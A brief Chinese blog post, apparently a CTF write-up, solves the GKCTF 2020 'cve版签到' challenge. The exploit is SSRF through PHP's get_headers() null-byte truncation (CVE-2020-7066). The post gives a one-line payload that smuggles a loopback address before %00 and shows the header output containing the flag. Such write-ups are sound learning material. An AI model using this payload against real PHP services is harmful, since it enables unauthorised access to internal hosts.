Web入门-SSRF漏洞

发表于2024-03-10|更新于2024-03-10

|阅读量:

Web入门-SSRF漏洞

[GKCTF 2020]cve版签到

SSRF漏洞，结合CVE-2020-7066：get_headers()会被%00截断。

payload：

1	?url=http://127.0.0.123%00www.ctfhub.com

注，如下返回格式为get_headers()的特征：

Array
(
    [0] => HTTP/1.1 200 OK
    [1] => Date: Mon, 05 Jun 2023 12:32:32 GMT
    [2] => Server: Apache/2.4.38 (Debian)
    [3] => X-Powered-By: PHP/7.3.15
    [4] => FLAG: NSSCTF{586773c7-706a-4413-9456-f3d363f47288}
    [5] => Vary: Accept-Encoding
    [6] => Content-Length: 113
    [7] => Connection: close
    [8] => Content-Type: text/html; charset=UTF-8
)

文章作者: Monoceros406

文章链接: http://monoceros.github.io/2024/03/10/Web%E5%85%A5%E9%97%A8-SSRF%E6%BC%8F%E6%B4%9E/

Web